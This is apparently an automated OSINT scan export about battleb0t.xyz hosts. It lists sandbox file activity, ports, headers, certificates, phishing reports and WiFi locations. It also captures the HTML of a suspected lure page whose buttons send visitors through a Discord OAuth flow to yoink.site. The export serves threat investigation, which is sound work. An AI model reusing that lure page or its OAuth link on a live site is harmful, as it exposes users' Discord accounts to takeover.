wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn 
tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\favicons"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\636_742791881\\shopping.js]- [targetUID: 00000000-00000636]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000636]\n "Ruleset Data" has type "da |
| 2023-05-12 02:46:49 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 35.229.48.116:443 | 35.229.48.116 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | slideshare (Category: social)
https://www.slideshare.net/baptistevauthey | baptistevauthey |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | http://code.jquery.com/jquery-3.2.1.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:80 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache: MISS | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000rgb124.github.io]
https://www.openphish.com/feed.txt | 0000rgb124.github.io |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 125.48.229.35.bc.googleusercontent.com | 35.229.48.125 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6FE774 (Net ID: 00:0C:F6:6F:E7:74) | 50.8897, 6.0563 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_3.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:54:23 | HTTP Headers | No | Web Spider | 10 | 0 | 5 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 2 | 0 | None | GitHub.com | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:18:45 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=134 @ 90, 'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 78, 'Image XResolution': (0x011A) Ratio=72 @ 98, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 168, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 216, 'Image DateTime': (0x0132) ASCII=2023:01:11 18:24:47 @ 114, 'Image YResolution': (0x011B) Ratio=72 @ 106, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 180, 'EXIF ExifImageLength': (0xA003) Long=2316 @ 204, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 144, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 54, 'EXIF ExifImageWidth': (0xA002) Long=3088 @ 192, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 156} | https://pics.battleb0t.xyz/images/carti_1.jpg |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:3C:1A:6D) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LCPS-A (Net ID: 00:0C:E6:02:7D:6E) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mastodon-mastodon (Category: social)
https://mastodon.social/@login | login |
| 2023-05-12 02:55:28 | Raw Data from RIRs | No | URLScan.io | 0 | 0 | 2 | 0 | None | [{u'sort': [1679937961810, u'be713cda-cf3f-49bd-91b6-e8517dc017bf'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'tags': [u'falconsandbox'], u'url': u'http://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-27T17:26:01.810Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 0, u'encodedDataLength': 0, u'requests': 1, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/be713cda-cf3f-49bd-91b6-e8517dc017bf.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/be713cda-cf3f-49bd-91b6-e8517dc017bf/', u'_id': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'page': {u'url': u'http://kekw.battleb0t.xyz/jar', u'domain': u'kekw.battleb0t.xyz', u'apexDomain': u'battleb0t.xyz'}}, {u'sort': [1679768811151, u'4b027c18-4e16-4bfc-8793-6295946cceb7'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'https://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-25T18:26:51.151Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 84, u'requests': 1, u'dataLength': 11}, u'screenshot': u'https://urlscan.io/screenshots/4b027c18-4e16-4bfc-8793-6295946cceb7.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/4b027c18-4e16-4bfc-8793-6295946cceb7/', u'_id': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'page': {u'mimeType': u'text/plain', u'status': u'502', u'domain': u'kekw.battleb0t.xyz', u'url': u'https://kekw.battleb0t.xyz/jar', u'country': u'DE', u'tlsValidFrom': u'2023-03-23T21:24:09.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'tlsIssuer': u'Easypanel', u'tlsValidDays': 3650, u'ip': u'64.226.81.43', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 1, 
u'asn': u'AS14061'}}, {u'sort': [1678573216685, u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:20:16.685Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea/', u'_id': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}, {u'sort': [1678573191537, u'd8289b22-dbac-48d2-856a-e99fe632406b'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:19:51.537Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/d8289b22-dbac-48d2-856a-e99fe632406b.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/d8289b22-dbac-48d2-856a-e99fe632406b/', u'_id': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'page': {u'mimeType': u'text/html', u'status': 
u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}] | kekw.battleb0t.xyz |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:443 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eduwifi (Net ID: 00:02:2D:2B:E9:C1) | 37.7642, -122.3993 |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:80 | 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Motokiller (Category: images)
https://mklr.pl/user/login | login |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2086 | 87.248.157.102 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2096 | 188.114.96.1 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14805058800 |
| 2023-05-12 03:21:07 | Malicious IP on Same Subnet | Yes | Emerging Threats | 0 | 0 | 4 | 0 | None | emergingthreats.net [165.232.112.0/20]
https://rules.emergingthreats.net/blockrules/compromised-ips.txt | 165.232.112.0/20 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:8443 | 188.114.96.0/24 |
| 2023-05-12 02:53:00 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://oldfluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://oldfluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | oldfluid.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c546dd3883829f4-ORD
| 188.114.97.1 |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 70.170.74.34.bc.googleusercontent.com | 34.74.170.70 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.33): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 006f10 (Net ID: 00:02:2D:00:6F:10) | 37.7642, -122.3993 |
| 2023-05-12 02:44:12 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| www.battleb0t.xyz |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007joshie.github.io | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | okidoki (Category: misc)
https://m.okidoki.ee/ru/users/login/ | login |
| 2023-05-12 02:49:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.110.153 |
| 2023-05-12 02:56:18 | Netblock Membership | No | RIPE | 0 | 0 | 2 | 0 | None | 188.114.96.0/24 | 188.114.96.1 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | krommewaal (Net ID: 00:01:71:0A:07:2B) | 52.3759, 4.8975 |
| 2023-05-12 03:01:16 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.140): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01.github.io |
